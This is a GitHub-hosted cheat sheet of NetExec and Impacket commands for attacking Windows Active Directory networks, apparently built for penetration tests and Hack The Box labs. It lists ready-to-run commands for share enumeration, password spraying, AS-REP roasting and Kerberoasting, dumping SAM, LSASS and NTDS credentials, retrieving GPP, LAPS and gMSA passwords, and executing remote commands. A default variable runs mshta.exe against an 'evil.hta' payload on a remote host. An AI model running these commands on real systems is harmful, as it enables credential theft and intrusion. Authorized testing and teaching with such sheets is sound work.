-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathnetexec.cheat
222 lines (161 loc) · 7.88 KB
/
netexec.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
% NetExec / CrackMapExec
;$ ip: $ip
;$ username: ''
;$ password: ''
;$ relay-file: 'relay-list.txt'
;$ command: 'mshta.exe http://<ip>/evil.hta'
# SMB Connectivity Check
nxc smb <ip>
## Enumerating SMB shares
# SMB Share NULL session
nxc smb <ip> -u '' -p ''
# SMB Share Anonymous session
nxc smb <ip> -u 'anonymous' -p '' --local-auth
# SMB Share Guest session
nxc smb <ip> -u 'guest' -p ''
# SMB Share Authenticated session
nxc smb <ip> -u '<username>' -p '<password>' # or -H '<hash>'
## Spider SMB shares
# Spider SMB Share NULL session
nxc smb <ip> -u '' -p '' -M spider_plus
# Spider SMB Share Anonymous session
nxc smb <ip> -u 'anonymous' -p '' --local-auth -M spider_plus
# Spider SMB Share Guest session
nxc smb <ip> -u 'guest' -p '' -M spider_plus
# Spider SMB Share Authenticated session
nxc smb <ip> -u '<username>' -p '<password>' -M spider_plus
# Spider+Download SMB Share NULL session
nxc smb <ip> -u '' -p '' -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER=.
# Spider+Download SMB Share Anonymous session
nxc smb <ip> -u 'anonymous' -p '' --local-auth -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER=.
# Spider+Download SMB Share Guest session
nxc smb <ip> -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER=.
# Spider+Download SMB Share Authenticated session
nxc smb <ip> -u '<username>' -p '<password>' -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER=.
## Working files on with SMB Shares
# NetExec SMB Upload file on remote
nxc smb <ip> -u '<username>' -p '<password>' --put-file <local-file> <remote-file>
# NetExec SMB Download file from remote
nxc smb <ip> -u '<username>' -p '<password>' --get-file <remote-file> <local-file>
# Get SMB relays with no SMB signing
nxc smb <ip> --gen-relay-list <relay-file>
# Execute Command or file
nxc smb <ip> -u '<username>' -p '<password>' -x '<command>'
## Enumerating Password Policy
# Password Policy NULL session
nxc smb <ip> -u '' -p '' --pass-pol
# Password Policy Anonymous session
nxc smb <ip> -u 'anonymous' -p '' --local-auth --pass-pol
# Password Policy Guest session
nxc smb <ip> -u 'guest' -p '' --pass-pol
# Password Policy Authenticated session
nxc smb <ip> -u '<username>' -p '<password>' --pass-pol
## SMB password spraying
# SMB Password Spray with user/pass list
nxc smb <ip> -u user.txt -p pass.txt
# SMB Password Spray with user/pass list (contiunue/no bruteforcing)
nxc smb <ip> -u user.txt -p pass.txt --continue-on-success --no-bruteforce
## Enumerating Users
# Enumerate Users NULL session (SMB)
nxc smb <ip> -u '' -p '' --users
# Enumerate Users NULL session (LDAP)
nxc ldap <ip> -u '' -p '' --users
# Enumerate Users Anonymous session (SMB)
nxc smb <ip> -u 'anonymous' -p '' --local-auth --users
# Enumerate Users Anonymous session (LDAP)
nxc ldap <ip> -u 'anonymous' -p '' --local-auth --users
# Enumerate Users Guest session (SMB)
nxc smb <ip> -u 'guest' -p '' --users
# Enumerate Users Guest session (LDAP)
nxc ldap <ip> -u 'guest' -p '' --users
# Enumerate Users Authenticated session (SMB)
nxc smb <ip> -u '<username>' -p '<password>' --users
# Enumerate Users Authenticated session (LDAP)
nxc ldap <ip> -u '<username>' -p '<password>' --users
# Enumerate users by bruteforcing the RID + save users list (10000 is optional)
nxc smb <ip> -u guest -p '' --rid-brute 10000 --log rid-brute.txt
# Enumerate Logged-on Users (Authenticated)
nxc smb <ip> -u '<username>' -p '<password>' --loggedon-users
# Get user's description
nxc ldap <ip> -u '<username>' -p '<password>' -M get-desc-users
## Enumerating Groups
# Enumerate Groups NULL session
nxc smb <ip> -u '' -p '' --groups
# Enumerate Groups Anonymous session
nxc smb <ip> -u 'anonymous' -p '' --local-auth --groups
# Enumerate Groups Guest session
nxc smb <ip> -u 'guest' -p '' --groups
# Enumerate Groups Authenticated session
nxc smb <ip> -u '<username>' -p '<password>' --groups
## FTP
# List files on FTP server
nxc ftp <ip> -u '<username>' -p '<password>' --ls
# List files on FTP server (specific path)
nxc ftp <ip> -u '<username>' -p '<password>' --ls '<path>'
# Download file from FTP server (specific path)
nxc ftp <ip> -u '<username>' -p '<password>' --get '<file>'
# Upload file from attacker to FTP server (specific path)
nxc ftp <ip> -u '<username>' -p '<password>' --put <LOCAL_FILE> <REMOTE_FILE>
# Asreproast- Get and try cracking user account hash
nxc ldap <ip> -u '<username>' -p '' --asreproast asreproast.txt --kdcHost <ip>
# Impacket Asreproast
GetNPUsers.py <target> -usersfile users.txt -dc-ip <ip>
# Kerberoasting - Get and try cracking SPN account hash
nxc ldap <ip> -u '<username>' -p '<password>' --kerberoasting kerberoasting.txt --kdcHost <ip>
# Impacket Kerberoasting
GetUserSPNs.py -usersfile users.txt -no-pass -dc-ip <ip> -dc-host <ip> <target> -target-domain <domain>
## NetExec Query LDAP
# NetExec Query LDAP (example 1)
nxc ldap <ip> -u '' -p '' --query "(objectclass=*)" ""
# NetExec Query LDAP (example 2)
nxc ldap <ip> -u '' -p '' --query "(sAMAccountName=<username>)" ""
# LDAPSearch Query LDAP
ldapsearch -o ldif_wrap=no -xLLLH ldap://<ip> -D '<domain>\<username>' -w '<password>' -b "DC=intelligence,DC=htb" '(samaccountname=<username>)'
## Passwords
# Extract the SAM File + Dump Cached Passwords
nxc smb <ip> -u '<username>' -p '<password>' --sam --lsa --dpap
# Dump lsass with lsassy module:
nxc smb <ip> -u '<username>' -p '<password>' -M lsassy -o METHOD=comsvcs_stealth
# Extract passwords from the NTDS (dcsync)
nxc smb <ip> -d <domain> -u '<username>' -p '<password>' --ntds
## Get GPP policies
# `gpp_password` decrypts passwords stored in the Group.xml file
nxc smb <dc-ip> -u '' -p '' -M gpp_password
# `gpp_autologin` retrieves autologin information from the Registry.xml file
nxc smb <dc-ip> -u '' -p '' -M gpp_autologin
## Group Managed Service Accounts (gMSA)
# Requirements: user that can read msDS-ManagedPassword (Domain Admins cant read it by defualt)
nxc ldap <ip> -u '<username>' -p '<password>' --gmsa
## LAPS (Local administrator password solution) - retrieves both LAPS v1 and v2 passwords
# Requirements: Domain Admins or user that have Read/WriteProperty to the ms-MCS-AdmPwd attribute
nxc smb <ip> -u '<username>' -p '<password>' --laps # add --lsa use the laps admin to dump lsa
## Check for Spooler Service
nxc smb <ip> -u '<username>' -p '<password>' -M spooler
## Check for WebDav Service
nxc smb <ip> -u '<username>' -p '<password>' -M webdav
## Azure - Entra Connect Sync service username looks like 'MSOL_16fb75d0227d'
# Microsoft Online
nxc smb <ip> -u '<username>' -p '<password>' -M msol # Requirements: 'ADSyncAdmins' or 'local Administrators groups' on machine with AD Connect service to get the MSOL account password and dcsync with it
# Microsoft Online #2
nxc smb <ip> -u '<username>' -p '<password>' -M msol -o MSOL_PS1=C:\...\nxc\data\msol_dump\msol_dump.ps1
## mssql_priv
# NetExec MsSQL (Check authentication)
nxc mssql <ip> -u '<username>' -p '<password>' --local-auth --port 1434
# NetExec MsSQL (privesc module)
nxc mssql <ip> -u '<username>' -p '<password>' -M mssql_priv -o ACTION=privesc
# NetExec MsSQL: Execute Windows Commands (xp_cmdshell)
nxc mssql <ip> -u sa -p '<password>' --local-auth -x whoami
# Execute MSSQL commands
nxc mssql <ip> -u '<username>' -p '<password>' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
## WMI
# WMI: Execute Commands
nxc wmi <ip> -u '<username>' -p '<password>' -x whoami
## Read DACL Rights
# Read all the ACEs of a user
nxc ldap <dc-ip> -u '<username>' -p '<password>' --kdcHost <dc-ip> -M daclread -o TARGET=<username> ACTION=read
# Read all rights PRINCIPAL user have on TARGET user
nxc ldap <dc-ip> -u '<username>' -p '<password>' --kdcHost <dc-ip> -M daclread -o TARGET=<t_user> ACTION=read PRINCIPAL=<p_user>
# Find users with DCSync rights on this domain
nxc ldap <dc-ip> -u '<username>' -p '<password>' --kdcHost <dc-ip> -M daclread -o TARGET_DN="DC=htb,DC=LOCAL" ACTION=read RIGHTS=DCSync
## Enumerate Domain Trusts
nxc ldap <ip> -u '<username>' -p '<password>' -M enum_trusts